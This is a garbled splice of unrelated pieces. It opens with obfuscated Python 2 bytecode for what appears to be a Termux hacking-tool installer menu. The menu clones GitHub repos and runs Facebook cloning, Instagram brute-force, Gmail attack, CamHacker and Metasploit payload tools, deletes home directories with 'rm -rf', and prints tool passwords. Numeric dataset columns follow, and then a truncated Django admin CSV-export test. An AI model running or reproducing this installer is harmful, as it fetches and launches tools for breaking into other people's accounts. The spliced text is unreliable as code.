0\x00NR\x05\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xa9?s?\x00\x00\x00\x1b[1;41m\x1b[1;37m1 To return to this menu from any Tool \x1b[1;0ms?\x00\x00\x00\x1b[1;41m2\x1b[1;37m Stop Process Press CTRL + z \x1b[1;0ms?\x00\x00\x00\x1b[1;41m3\x1b[1;37m Type python2 Cloning.py \x1b[1;0ms2\x00\x00\x00\x1b[1;96m[1] Install With Out Fb Id Tool \xf0\x9f\xa6\x85s2\x00\x00\x00\x1b[1;96m[2] Install Facebook login Tool \xf0\x9f\x90\x9ds5\x00\x00\x00\x1b[1;96m[3] Install SpiderMan Tool \xf0\x9f\x95\xb8\xef\xb8\x8fs2\x00\x00\x00\x1b[1;96m[4] Install Kalilinux Tool \xf0\x9f\xa6\x87s2\x00\x00\x00\x1b[1;96m[5] Install BlackHat Tool \xf0\x9f\xa6\x8bs2\x00\x00\x00\x1b[1;96m[6] 
Install RedMoonNew Tool \xf0\x9f\x90\x9es2\x00\x00\x00\x1b[1;96m[7] Install love3Hack3r Tool \xf0\x9f\x90\x9cs2\x00\x00\x00\x1b[1;96m[8] Install Cobra Tool \xf0\x9f\x90\x8ds2\x00\x00\x00\x1b[1;96m[9] Install Dragon Tool \xf0\x9f\x90\x89s2\x00\x00\x00\x1b[1;96m[10] Install NetHunting Tool \xf0\x9f\x8c\x8ds2\x00\x00\x00\x1b[1;96m[11] Install Payload Tool \xf0\x9f\x92\xb5s2\x00\x00\x00\x1b[1;96m[12] Install CamHacker Tool \xf0\x9f\x93\xb8s2\x00\x00\x00\x1b[1;96m[13] Install Compiler Tool \xf0\x9f\x93\xa1s2\x00\x00\x00\x1b[1;96m[14] Install Instagram Brut Tool \xf0\x9f\x94\x91s2\x00\x00\x00\x1b[1;96m[15] Install Marsh Base Tool \xf0\x9f\x92\xbes2\x00\x00\x00\x1b[1;96m[16] Install Gmail Target Tool \xf0\x9f\x93\xa7s4\x00\x00\x00\x1b[1;96m[17] Install Termux Logo Tool \xe2\x9a\x9c\xef\xb8\x8fs2\x00\x00\x00\x1b[1;95m[18] Tool Update \xf0\x9f\x94\x84s\x10\x00\x00\x00\x1b[1;91m[0] EXIT(\x07\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00t\x04\x00\x00\x00logoR\x08\x00\x00\x00R\t\x00\x00\x00t\x05\x00\x00\x00mafia(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x04\x00\x00\x00menu7\x00\x00\x00sb\x00\x00\x00\x00\x01\x07\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1d\t\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xf2\x08|\x00\x00d\x04\x00k\x02\x00r\x8f\x00t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x05\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x06\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x07\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\n\x00\x8
3\x01\x00\x01n\x8a\x08|\x00\x00d\x0b\x00k\x02\x00r\x0b\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x0c\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\r\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x07\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01t\x06\x00d\x0f\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x10\x00\x83\x01\x00\x01n\x0e\x08|\x00\x00d\x11\x00k\x02\x00r}\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x12\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x14\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d\x16\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x17\x00\x83\x01\x00\x01n\x9c\x07|\x00\x00d\x18\x00k\x02\x00r\xef\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x19\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d\x1b\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x1c\x00\x83\x01\x00\x01n*\x07|\x00\x00d\x1d\x00k\x02\x00ra\x02t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x1e\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1f\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d 
\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d!\x00\x83\x01\x00\x01n\xb8\x06|\x00\x00d"\x00k\x02\x00r\xd3\x02t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d#\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d$\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d%\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d&\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\'\x00\x83\x01\x00\x01nF\x06|\x00\x00d(\x00k\x02\x00r;\x03t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d)\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d*\x00\x83\x01\x00\x01n\xde\x05|\x00\x00d+\x00k\x02\x00r\xad\x03t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d,\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d-\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d.\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d/\x00\x83\x01\x00\x01nl\x05|\x00\x00d0\x00k\x02\x00r\x1f\x04t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d1\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d2\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d3\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d4\x00\x83\x01\x00\x01n\xfa\x04|\x00\x00d5\x00k\x02\x00r\x91\x04t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d6\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d7\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d8\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d9\x00\x83\x01\x00\x01n\x88\x04|\x00\x00d:\x00k\x02\x00r 
\x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d;\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d<\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d=\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d>\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d?\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d@\x00\x83\x01\x00\x01n\xf9\x03|\x00\x00dA\x00k\x02\x00r\x92\x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dB\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dC\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dD\x00\x83\x01\x00\x01t\x07\x00j\x08\x00dE\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dF\x00\x83\x01\x00\x01n\x87\x03|\x00\x00dG\x00k\x02\x00r\xfa\x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dH\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dJ\x00\x83\x01\x00\x01n\x1f\x03|\x00\x00dK\x00k\x02\x00ry\x06t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dL\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dM\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dN\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dO\x00\x83\x01\x00\x01n\xa0\x02|\x00\x00dP\x00k\x02\x00r\xe1\x06t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dQ\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dR\x00\x83\x01\x00\x01n8\x02|\x00\x00dS\x00k\x02\x00rS\x07t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dT\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dU\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x0
1t\x06\x00dV\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d&\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dW\x00\x83\x01\x00\x01n\xc6\x01|\x00\x00dX\x00k\x02\x00r\xbb\x07t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dY\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dZ\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d[\x00\x83\x01\x00\x01n^\x01|\x00\x00d\\\x00k\x02\x00r#\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d]\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d^\x00\x83\x01\x00\x01n\xf6\x00|\x00\x00d_\x00k\x02\x00r\x95\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d]\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dN\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d^\x00\x83\x01\x00\x01n\x84\x00|\x00\x00d`\x00k\x02\x00r\xfd\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00da\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00db\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dc\x00\x83\x01\x00\x01n\x1c\x00|\x00\x00dd\x00k\x02\x00r\x19\tt\x04\x00j\x05\x00de\x00\x83\x01\x00\x01n\x00\x00d\x00\x00S(f\x00\x00\x00Ns\x16\x00\x00\x00\x1b[1;91mSlect option>>>t\x00\x00\x00\x00s\x17\x00\x00\x00Select a valid option !t\x01\x00\x00\x001s\x10\x00\x00\x00rm -rf $HOME/402s8\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay/hack911s)\x00\x00\x00\x1b[1;93mTool User Name :\x1b[1;95m Black s)\x00\x00\x00\x1b[1;93mTool Password :\x1b[1;95m Mafia i\x05\x00\x00\x00s\'\x00\x00\x00cd $HOME/402 && python2 Cloningx-2-1.pyt\x01\x00\x00\x002s\x16\x00\x00\x00rm -rf 
$HOME/blackholesL\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay-MB911/OmDenay-MB911/hack911s%\x00\x00\x00\x1b[1;93m :Target Attack : s/\x00\x00\x00\x1b[1;93mPassword list :\x1b[1;95mlovehacker-2.txt s*\x00\x00\x00cd $HOME/blackhole && python2 AsifJaved.pyt\x01\x00\x00\x003s\x13\x00\x00\x00rm -rf $HOME/Spiders>\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay-MB911/hack911sA\x00\x00\x00\x1b[1;91mCongratulations Cobra Tool Has Been Installed Successfullys#\x00\x00\x00Now you can open this tool as usuals3\x00\x00\x00\x1b[1;93mTool User Name SpiderMan Password lovehackers\'\x00\x00\x00cd $HOME/Spider && python2 SpiderMan.pyt\x01\x00\x00\x004s\x16\x00\x00\x00rm -rf $HOME/KaliIndiasF\x00\x00\x00\x1b[1;96mCongratulations BlackMafia Tool Has Been Installed Successfullys/\x00\x00\x00\x1b[1;93mTool User Name India Password lovehackers0\x00\x00\x00cd $HOME/KaliIndia && python2 kalilinux.India.pyt\x01\x00\x00\x005s\x15\x00\x00\x00rm -rf $HOME/BlackHatsD\x00\x00\x00\x1b[1;96mCongratulations BlackHat Tool Has Been Installed Successfullys5\x00\x00\x00\x1b[1;93mTool User Name BlackHat Password OmDenay-MB911s(\x00\x00\x00cd $HOME/BlackHat && python2 BlackHat.pyt\x01\x00\x00\x006s\x17\x00\x00\x00rm -rf $HOME/RedMoonNewsF\x00\x00\x00\x1b[1;91mCongratulations RedMoonNew Tool Has Been Installed SuccessfullysI\x00\x00\x00\x1b[1;93mTool User Name\x1b[1;92m RedMoonNew\x1b[1;93m Password \x1b[1;92mlovehackeri\x06\x00\x00\x00s)\x00\x00\x00cd $HOME/RedMoonNew && python2 lovehackert\x01\x00\x00\x007s\x10\x00\x00\x00rm -rf $HOME/911s+\x00\x00\x00cd $HOME/lov3Hak3r && python2 lovehacker.pyt\x01\x00\x00\x008s\x12\x00\x00\x00rm -rf $HOME/CobrasA\x00\x00\x00\x1b[1;93mCongratulations Cobra Tool Has Been Installed Successfullys0\x00\x00\x00\x1b[1;95mTool User Name Cobra Password lovehackers%\x00\x00\x00cd $HOME/Cobra && python2 Scorpion.pyt\x01\x00\x00\x009s\x13\x00\x00\x00rm -rf $HOME/DragonsB\x00\x00\x00\x1b[1;91mCongratulations Dragon Tool Has Been Installed 
Successfullys1\x00\x00\x00\x1b[1;96mTool User Name Dragon Password lovehackers(\x00\x00\x00cd $HOME/Dragon && python2 lovehacker.pyt\x02\x00\x00\x0010s\x17\x00\x00\x00rm -rf $HOME/NetHuntingsF\x00\x00\x00\x1b[1;96mCongratulations NetHunting Tool Has Been Installed Successfullys/\x00\x00\x00\x1b[1;92mTool User Name linux Password lovehackers,\x00\x00\x00cd $HOME/NetHunting && python2 NetHunting.pyt\x02\x00\x00\x0011s\x19\x00\x00\x00pkg install unstable-repos\x16\x00\x00\x00pkg install metasploits\x16\x00\x00\x00pkg install msfconsoles\x18\x00\x00\x00rm -rf $HOME/Black_MafiasO\x00\x00\x00\x1b[1;93mCongratulations Black_Mafia Payload Tool Has Been Installed Successfullys.\x00\x00\x00cd $HOME/Black_Mafia && python3 Black_Mafia.pyt\x02\x00\x00\x0012s\x10\x00\x00\x00rm -rf $HOME/PaksE\x00\x00\x00\x1b[1;96mCongratulations CamHacker Tool Has Been Installed Successfullys\x1f\x00\x00\x00\x1b[1;92mEducational Perpose onlyi\x02\x00\x00\x00s$\x00\x00\x00cd $HOME/Pak && python lovehacker.pyt\x02\x00\x00\x0013s\x14\x00\x00\x00rm -rf $HOME/Compiles9\x00\x00\x00\x1b[1;93mCongratulations Tool Has Been Update Successfullys)\x00\x00\x00cd $HOME/Compile && python2 lovehacker.pyt\x02\x00\x00\x0014s\x10\x00\x00\x00pip2 install bs4s\x12\x00\x00\x00rm -rf $HOME/Instas4\x00\x00\x00Passwordlist No1 (wordlist.txt) No2 (BlackMafia.txt)s\'\x00\x00\x00cd $HOME/Insta && python2 lovehacker.pyt\x02\x00\x00\x0015s\x15\x00\x00\x00rm -rf $HOME/TimePasss*\x00\x00\x00cd $HOME/TimePass && python2 lovehacker.pyt\x02\x00\x00\x0016s\x18\x00\x00\x00rm -rf $HOME/GmailAttacksG\x00\x00\x00\x1b[1;96mCongratulations GmailAttack Tool Has Been Installed Successfullys.\x00\x00\x00plz wi8 Password list name (lovehacker-1.txt) s-\x00\x00\x00cd $HOME/GmailAttack && python2 lovehacker.pyt\x02\x00\x00\x0017s\x11\x00\x00\x00rm -rf $HOME/LogosL\x00\x00\x00\x1b[1;96mCongratulations BlackMafia Logo Tool Has Been Installed Successfullys#\x00\x00\x00cd $HOME/Logo && bash lovehacker.sht\x02\x00\x00\x0018s\x12\x00\x00\x00rm -rf 
$HOME/Worlds$\x00\x00\x00cd $HOME/World && python2 Cloning.pyt\x02\x00\x00\x0019t\x02\x00\x00\x0020s\x14\x00\x00\x00rm -rf $HOME/TestingsD\x00\x00\x00\x1b[1;93mCongratulations CoviD-19 Tool Has Been Installed Successfullys\'\x00\x00\x00cd $HOME/CoviD-19 && python2 Project.pyt\x01\x00\x00\x000t\x04\x00\x00\x00exit(\t\x00\x00\x00t\t\x00\x00\x00raw_inputR\x14\x00\x00\x00R\x05\x00\x00\x00R\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x12\x00\x00\x00R\x08\x00\x00\x00R\t\x00\x00\x00(\x01\x00\x00\x00t\x05\x00\x00\x00black(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>R\x14\x00\x00\x00i\x00\x00\x00s\xbe\x01\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\
n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01t\x08\x00\x00\x00__main__(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(*\x00\x00\x00R\x06\x00\x00\x00R\x0c\x00\x00\x00R\x08\x00\x00\x00t\x08\x00\x00\x00datetimet\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\x02\x00\x00\x00ret\t\x00\x00\x00threadingt\x04\x00\x00\x00jsont\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibt\x08\x00\x00\x00requestst\t\x00\x00\x00mechanizet\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x02\x00\x00\x00brt\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x13\x00\x00\x00t\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Yt\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00St\x01\x00\x00\x00WR\x05\x00\x00\x00R\n\x00\x00\x00R\x0b\x00\x00\x00R\x12\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s2\x00\x00\x00\x9c\x01\x10\x01\x10\x01\x10\x03\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x0b\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t\x04\t\x02\t\x04\t\x06\t2\t\xe0\x0c\x01'))
| 6,015.75
| 23,985
| 0.751984
| 5,173
| 24,063
| 3.493717
| 0.098975
| 0.170641
| 0.092126
| 0.112876
| 0.679688
| 0.618658
| 0.511149
| 0.482598
| 0.465114
| 0.452222
| 0
| 0.366911
| 0.034202
| 24,063
| 4
| 23,985
| 6,015.75
| 0.410757
| 0.002452
| 0
| 0
| 0
| 2.5
| 0.298504
| 0.253677
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 9
|
90ee138e17efdd02e393b3b39634bbc43bb8ba32
| 188
|
py
|
Python
|
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | 1
|
2021-05-02T21:10:52.000Z
|
2021-05-02T21:10:52.000Z
|
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | null | null | null |
gcforest/cascade/__init__.py
|
MJ10/gcForest
|
88f4f16d56642bf8bea53f4f08869dc6767345b2
|
[
"MIT"
] | null | null | null |
from .cascade_classifier import CascadeClassifier
from .cascade_classifier import get_opt_layer_id
from .cascade_classifier import check_dir
from .cascade_classifier import calc_accuracy
| 31.333333
| 49
| 0.888298
| 25
| 188
| 6.32
| 0.52
| 0.278481
| 0.531646
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090426
| 188
| 5
| 50
| 37.6
| 0.923977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
90ff99b3d0007721217f13be383abf740741489d
| 19,310
|
py
|
Python
|
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | 1
|
2021-11-06T12:08:26.000Z
|
2021-11-06T12:08:26.000Z
|
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | null | null | null |
supplier/tests/test_admin.py
|
konradko/directory-api
|
e9cd05b1deaf575e94352c46ddbd1857d8119fda
|
[
"MIT"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
from unittest.mock import patch
from django.test import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
import pytest
from freezegun import freeze_time
from supplier.models import Supplier
from supplier.tests import VALID_REQUEST_DATA as SUPPLIER_DATA
from company.models import Company, CompanyCaseStudy
from company.tests import VALID_REQUEST_DATA
COMPANY_DATA = VALID_REQUEST_DATA.copy()
@pytest.mark.django_db
class DownloadCSVTestCase(TestCase):
def setUp(self):
    """Prepare an authenticated admin client with a frozen clock.

    Creates a superuser, logs the Django test client in as that user,
    and starts freezegun so `created`/`modified` timestamps rendered
    into the CSV are deterministic across runs.
    """
    admin_user = User.objects.create_superuser(
        username='admin',
        email='admin@example.com',
        password='test',
    )
    self.client = Client()
    self.client.force_login(admin_user)
    # Pin "now" so timestamp columns in the expected CSV stay stable.
    self.freezer = freeze_time("2012-01-14 12:00:00")
    self.freezer.start()
def tearDown(self):
    """Stop the freezegun clock started in ``setUp``."""
    self.freezer.stop()
def test_download_csv(self):
# Create one supplier whose company has two sectors, trigger the admin
# "download_csv" action via the supplier changelist, and compare the CSV
# header row and first data row against the full expected column set.
company = Company.objects.create(
**COMPANY_DATA,
sectors=['TEST', 'FOO']
)
supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
# Payload mimics the admin changelist action form: the action name plus
# the primary keys of the selected rows.
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
# Expected CSV columns and values, in the exact order the admin action
# emits them (alphabetical company__* fields first, supplier fields last).
expected_data = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
